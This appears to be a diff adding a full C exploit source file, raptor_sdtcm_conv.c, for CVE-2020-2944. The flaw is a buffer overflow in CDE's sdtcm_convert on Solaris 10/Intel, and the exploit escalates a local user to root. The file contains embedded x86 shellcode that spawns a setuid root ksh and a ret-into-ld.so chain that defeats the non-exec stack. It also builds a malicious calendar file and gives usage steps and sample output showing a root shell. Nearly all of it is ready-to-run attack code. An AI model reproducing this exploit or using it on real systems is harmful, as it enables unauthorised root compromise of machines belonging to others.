| | 1 | + | /* |
| | 2 | + | * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel |
| | 3 | + | * Copyright (c) 2019-2020 Marco Ivaldi <[email protected]> |
| | 4 | + | * |
| | 5 | + | * A buffer overflow in the _SanityCheck() function in the Common Desktop |
| | 6 | + | * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and |
| | 7 | + | * earlier allows local users to gain root privileges via a long calendar name |
| | 8 | + | * or calendar owner passed to sdtcm_convert in a malicious calendar file |
| | 9 | + | * (CVE-2020-2944). |
| | 10 | + | * |
| | 11 | + | * The open source version of CDE (based on the CDE 2.x codebase) is not |
| | 12 | + | * affected, because it does not ship the vulnerable binary. |
| | 13 | + | * |
| | 14 | + | * "CDE, the gift that keeps on giving" -- @0xdea |
| | 15 | + | * "Feels more like a curse you can't break from this side." -- @alanc |
| | 16 | + | * |
| | 17 | + | * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack |
| | 18 | + | * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory |
| | 19 | + | * space, try returning to sprintf() instead of strcpy(). |
| | 20 | + | * |
| | 21 | + | * I haven't written a Solaris/SPARC version because I don't have a SPARC box |
| | 22 | + | * on which Solaris 10 can run. If anybody is kind enough to give me access to |
| | 23 | + | * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. |
| | 24 | + | * |
| | 25 | + | * Usage: |
| | 26 | + | * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall |
| | 27 | + | * $ ./raptor_sdtcm_conv |
| | 28 | + | * [...] |
| | 29 | + | * Do you want to correct it? (Y/N) [Y] n |
| | 30 | + | * # id |
| | 31 | + | * uid=0(root) gid=1(other) egid=12(daemon) |
| | 32 | + | * # |
| | 33 | + | * |
| | 34 | + | * This should work with any common configuration on the first try. To |
| | 35 | + | * re-enable rpc.cmsd, clear its service maintenance status by running the |
| | 36 | + | * following commands as root: |
| | 37 | + | * # /usr/sbin/svcadm clear cde-calendar-manager |
| | 38 | + | * # /usr/bin/svcs -a | grep calendar |
| | 39 | + | * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default |
| | 40 | + | * |
| | 41 | + | * Tested on: |
| | 42 | + | * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) |
| | 43 | + | * [previous Solaris versions are also likely vulnerable] |
| | 44 | + | */ |
| | 45 | + | |
| | 46 | + | #include <fcntl.h> |
| | 47 | + | #include <link.h> |
| | 48 | + | #include <procfs.h> |
| | 49 | + | #include <stdio.h> |
| | 50 | + | #include <stdlib.h> |
| | 51 | + | #include <strings.h> |
| | 52 | + | #include <unistd.h> |
| | 53 | + | #include <sys/stat.h> |
| | 54 | + | #include <sys/systeminfo.h> |
| | 55 | + | #include <sys/types.h> |
| | 56 | + | |
| | 57 | + | #define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel" |
| | 58 | + | #define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>" |
| | 59 | + | |
| | 60 | + | #define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program |
| | 61 | + | #define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility |
| | 62 | + | #define BUFSIZE 2304 // size of the name/owner |
| | 63 | + | #define PAYSIZE 1024 // size of the payload |
| | 64 | + | #define OFFSET env_len / 2 // offset to the shellcode |
| | 65 | + | |
| | 66 | + | char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ |
| | 67 | + | /* double setuid() */ |
| | 68 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| | 69 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| | 70 | + | /* execve() */ |
| | 71 | + | "\x31\xc0\x50\x68/ksh\x68/bin" |
| | 72 | + | "\x89\xe3\x50\x53\x89\xe2\x50" |
| | 73 | + | "\x52\x53\xb0\x3b\x50\xcd\x91"; |
| | 74 | + | |
| | 75 | + | /* globals */ |
| | 76 | + | char *env[256]; |
| | 77 | + | int env_pos = 0, env_len = 0; |
| | 78 | + | |
| | 79 | + | /* prototypes */ |
| | 80 | + | int add_env(char *string); |
| | 81 | + | void check_zero(int addr, char *pattern); |
| | 82 | + | int search_ldso(char *sym); |
| | 83 | + | int search_rwx_mem(void); |
| | 84 | + | void set_val(char *buf, int pos, int val); |
| | 85 | + | |
| | 86 | + | /* |
| | 87 | + | * main() |
| | 88 | + | */ |
| | 89 | + | int main(int argc, char **argv) |
| | 90 | + | { |
| | 91 | + | char buf[BUFSIZE], payload[PAYSIZE]; |
| | 92 | + | char platform[256], release[256], hostname[256]; |
| | 93 | + | int i, payaddr; |
| | 94 | + | |
| | 95 | + | char *arg[3] = {"foo", "hax0r", NULL}; |
| | 96 | + | int sb = ((int)argv[0] | 0xfff); /* stack base */ |
| | 97 | + | int ret = search_ldso("strcpy"); /* or sprintf */ |
| | 98 | + | int rwx_mem = search_rwx_mem(); /* rwx memory */ |
| | 99 | + | |
| | 100 | + | char cmd[1024]; |
| | 101 | + | FILE *fp; |
| | 102 | + | |
| | 103 | + | /* print exploit information */ |
| | 104 | + | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); |
| | 105 | + | |
| | 106 | + | /* read command line */ |
| | 107 | + | if (argc != 1) { |
| | 108 | + | fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]); |
| | 109 | + | fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n"); |
| | 110 | + | exit(1); |
| | 111 | + | } |
| | 112 | + | |
| | 113 | + | /* get system information */ |
| | 114 | + | sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); |
| | 115 | + | sysinfo(SI_RELEASE, release, sizeof(release) - 1); |
| | 116 | + | sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1); |
| | 117 | + | |
| | 118 | + | /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ |
| | 119 | + | memset(payload, '\x90', PAYSIZE); |
| | 120 | + | payload[PAYSIZE - 1] = 0x0; |
| | 121 | + | memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); |
| | 122 | + | |
| | 123 | + | /* fill the envp, keeping padding */ |
| | 124 | + | add_env(payload); |
| | 125 | + | add_env("HOME=/tmp"); |
| | 126 | + | add_env(NULL); |
| | 127 | + | |
| | 128 | + | /* calculate the payload address */ |
| | 129 | + | payaddr = sb - OFFSET; |
| | 130 | + | |
| | 131 | + | /* prepare the evil palette name */ |
| | 132 | + | memset(buf, 'A', sizeof(buf)); |
| | 133 | + | buf[sizeof(buf) - 1] = 0x0; |
| | 134 | + | |
| | 135 | + | /* fill with function address in ld.so.1, saved eip, and arguments */ |
| | 136 | + | for (i = 0; i < BUFSIZE - 16; i += 4) { |
| | 137 | + | set_val(buf, i, ret); /* strcpy */ |
| | 138 | + | set_val(buf, i += 4, rwx_mem); /* saved eip */ |
| | 139 | + | set_val(buf, i += 4, rwx_mem); /* 1st argument */ |
| | 140 | + | set_val(buf, i += 4, payaddr); /* 2nd argument */ |
| | 141 | + | } |
| | 142 | + | |
| | 143 | + | /* print some output */ |
| | 144 | + | fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); |
| | 145 | + | fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname); |
| | 146 | + | fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); |
| | 147 | + | fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); |
| | 148 | + | fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); |
| | 149 | + | fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); |
| | 150 | + | |
| | 151 | + | /* create the evil calendar file */ |
| | 152 | + | fprintf(stderr, "Preparing the evil calendar file... "); |
| | 153 | + | snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname); |
| | 154 | + | if (system(cmd) == -1) { |
| | 155 | + | perror("Error creating calendar file"); |
| | 156 | + | exit(1); |
| | 157 | + | } |
| | 158 | + | if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) { |
| | 159 | + | perror("Error creating calendar file"); |
| | 160 | + | exit(1); |
| | 161 | + | } |
| | 162 | + | |
| | 163 | + | /* prepare the evil calendar file (badchars currently not handled) */ |
| | 164 | + | fp = fopen("/usr/spool/calendar/callog.hax0r", "w"); |
| | 165 | + | if (!fp) { |
| | 166 | + | perror("Error preparing calendar file"); |
| | 167 | + | exit(1); |
| | 168 | + | } |
| | 169 | + | fprintf(fp, "Version: 4\n(calendarattributes " |
| | 170 | + | "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\"," |
| | 171 | + | "\"10:access_list\",\"world:2\")\n"); |
| | 172 | + | /* buffer overflow in calendar name */ |
| | 173 | + | fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," |
| | 174 | + | "\"5:string\",\"%s\")\n", buf); |
| | 175 | + | fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," |
| | 176 | + | "\"6:user\",\"fnord\")\n)"); |
| | 177 | + | /* buffer overflow in calendar owner */ |
| | 178 | + | /* |
| | 179 | + | fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," |
| | 180 | + | "\"5:string\",\"hax0r\")\n"); |
| | 181 | + | fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," |
| | 182 | + | "\"6:user\",\"%s\")\n)", buf); |
| | 183 | + | */ |
| | 184 | + | fclose(fp); |
| | 185 | + | |
| | 186 | + | fprintf(stderr, "Done.\n"); |
| | 187 | + | |
| | 188 | + | /* run the vulnerable program */ |
| | 189 | + | fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n"); |
| | 190 | + | execve(VULN, arg, env); |
| | 191 | + | perror("execve"); |
| | 192 | + | exit(0); |
| | 193 | + | } |
| | 194 | + | |
| | 195 | + | /* |
| | 196 | + | * add_env(): add a variable to envp and pad if needed |
| | 197 | + | */ |
| | 198 | + | int add_env(char *string) |
| | 199 | + | { |
| | 200 | + | int i; |
| | 201 | + | |
| | 202 | + | /* null termination */ |
| | 203 | + | if (!string) { |
| | 204 | + | env[env_pos] = NULL; |
| | 205 | + | return env_len; |
| | 206 | + | } |
| | 207 | + | |
| | 208 | + | /* add the variable to envp */ |
| | 209 | + | env[env_pos] = string; |
| | 210 | + | env_len += strlen(string) + 1; |
| | 211 | + | env_pos++; |
| | 212 | + | |
| | 213 | + | /* pad the envp using zeroes */ |
| | 214 | + | if ((strlen(string) + 1) % 4) |
| | 215 | + | for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { |
| | 216 | + | env[env_pos] = string + strlen(string); |
| | 217 | + | env_len++; |
| | 218 | + | } |
| | 219 | + | |
| | 220 | + | return env_len; |
| | 221 | + | } |
| | 222 | + | |
| | 223 | + | /* |
| | 224 | + | * check_zero(): check an address for the presence of a 0x00 |
| | 225 | + | */ |
| | 226 | + | void check_zero(int addr, char *pattern) |
| | 227 | + | { |
| | 228 | + | if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || |
| | 229 | + | !(addr & 0xff000000)) { |
| | 230 | + | fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); |
| | 231 | + | exit(1); |
| | 232 | + | } |
| | 233 | + | } |
| | 234 | + | |
| | 235 | + | /* |
| | 236 | + | * search_ldso(): search for a symbol inside ld.so.1 |
| | 237 | + | */ |
| | 238 | + | int search_ldso(char *sym) |
| | 239 | + | { |
| | 240 | + | int addr; |
| | 241 | + | void *handle; |
| | 242 | + | Link_map *lm; |
| | 243 | + | |
| | 244 | + | /* open the executable object file */ |
| | 245 | + | if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { |
| | 246 | + | perror("dlopen"); |
| | 247 | + | exit(1); |
| | 248 | + | } |
| | 249 | + | |
| | 250 | + | /* get dynamic load information */ |
| | 251 | + | if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { |
| | 252 | + | perror("dlinfo"); |
| | 253 | + | exit(1); |
| | 254 | + | } |
| | 255 | + | |
| | 256 | + | /* search for the address of the symbol */ |
| | 257 | + | if ((addr = (int)dlsym(handle, sym)) == NULL) { |
| | 258 | + | fprintf(stderr, "Sorry, function %s() not found\n", sym); |
| | 259 | + | exit(1); |
| | 260 | + | } |
| | 261 | + | |
| | 262 | + | /* close the executable object file */ |
| | 263 | + | dlclose(handle); |
| | 264 | + | |
| | 265 | + | check_zero(addr - 4, sym); |
| | 266 | + | return addr; |
| | 267 | + | } |
| | 268 | + | |
| | 269 | + | /* |
| | 270 | + | * search_rwx_mem(): search for an RWX memory segment valid for all |
| | 271 | + | * programs (typically, /usr/lib/ld.so.1) using the proc filesystem |
| | 272 | + | */ |
| | 273 | + | int search_rwx_mem(void) |
| | 274 | + | { |
| | 275 | + | int fd; |
| | 276 | + | char tmp[16]; |
| | 277 | + | prmap_t map; |
| | 278 | + | int addr = 0, addr_old; |
| | 279 | + | |
| | 280 | + | /* open the proc filesystem */ |
| | 281 | + | sprintf(tmp,"/proc/%d/map", (int)getpid()); |
| | 282 | + | if ((fd = open(tmp, O_RDONLY)) < 0) { |
| | 283 | + | fprintf(stderr, "Can't open %s\n", tmp); |
| | 284 | + | exit(1); |
| | 285 | + | } |
| | 286 | + | |
| | 287 | + | /* search for the last RWX memory segment before stack (last - 1) */ |
| | 288 | + | while (read(fd, &map, sizeof(map))) |
| | 289 | + | if (map.pr_vaddr) |
| | 290 | + | if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { |
| | 291 | + | addr_old = addr; |
| | 292 | + | addr = map.pr_vaddr; |
| | 293 | + | } |
| | 294 | + | close(fd); |
| | 295 | + | |
| | 296 | + | /* add 4 to the exact address NULL bytes */ |
| | 297 | + | if (!(addr_old & 0xff)) |
| | 298 | + | addr_old |= 0x04; |
| | 299 | + | if (!(addr_old & 0xff00)) |
| | 300 | + | addr_old |= 0x0400; |
| | 301 | + | |
| | 302 | + | return addr_old; |
| | 303 | + | } |
| | 304 | + | |
| | 305 | + | /* |
| | 306 | + | * set_val(): copy a dword inside a buffer (little endian) |
| | 307 | + | */ |
| | 308 | + | void set_val(char *buf, int pos, int val) |
| | 309 | + | { |
| | 310 | + | buf[pos] = (val & 0x000000ff); |
| | 311 | + | buf[pos + 1] = (val & 0x0000ff00) >> 8; |
| | 312 | + | buf[pos + 2] = (val & 0x00ff0000) >> 16; |
| | 313 | + | buf[pos + 3] = (val & 0xff000000) >> 24; |
| | 314 | + | } |
| | 315 | + | |
